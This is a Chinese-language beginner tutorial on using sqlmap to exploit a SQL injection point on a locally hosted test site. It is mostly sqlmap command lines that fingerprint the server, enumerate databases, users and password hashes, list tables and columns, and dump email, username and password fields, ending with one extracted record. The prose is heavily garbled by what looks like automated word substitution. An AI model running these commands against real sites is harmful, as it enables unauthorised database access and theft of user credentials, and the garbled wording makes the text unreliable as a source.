对付网络安详人员来说,把握渗透东西的利用要领是一项必备的技术。然而,一个没有师傅教育的小白在刚开始进修时,并不知道该如何入手举办渗透进修,所以本文旨在辅佐这些小白入门。
sqlmap是一款很是强大的开源sql自动化注入东西,可以用来检测和操作sql注入裂痕。它由python语言开拓而成,,因此运行需要安装python情况。
测试情况:当地搭建的具有sql注入点的网站 http://192.168.1.150
留意:sqlmap只是用来检测和操作sql注入点的,并不能扫描出网站有哪些裂痕,利用前请先利用扫描东西扫出sql注入点。
教程开始:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"
参数:
-u:指定注入点url
功效:
注入功效展示:
(1)注入参数id为GET注入,注入范例有四类别离为:boolean-based blind、error-based、stacked queries、inline query。
(2)web处事器系统为windows 2003 or XP
(3)web应用措施技能为:ASP.NET, Microsoft IIS 6.0
(4)数据库范例为:SQLSERVER 2000
个中图一有若干询问语句,需要用户输入[Y/N],假如你懒得输入可能不懂怎么输入可以让措施自动输入,只需添加一个参数即可,呼吁如下:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
一条呼吁即可曝出该sqlserver中所有数据库名称,呼吁如下:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs
参数:
--dbs:dbs前面有两条杠,请看清楚。
功效:
功效显示该sqlserver中共包括7个可用的数据库。
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables
参数:
-D:指定命据库名称
--tables:列出表
功效:
功效浮现共列出了34张表。
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns
参数:
-D:指定命据库名称
-T:指定要列出字段的表
--columns:指定列出字段
功效:
功效显示该userb表中包括了23条字段。
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump
参数:
-C :指定要暴的字段
--dump:将功效导出
功效:
假如字段内容太多,需要耗费许多时间。可以指定导出特定范畴的字段内容,呼吁如下:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump
参数:
--start:指定开始的行
--stop:指定竣事的行
此条呼吁的寄义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。
功效如下:
通过上图功效看到个中的一个用户信息为:
email:[email protected]
username: 1.asp
password: 49ba59abbe56e057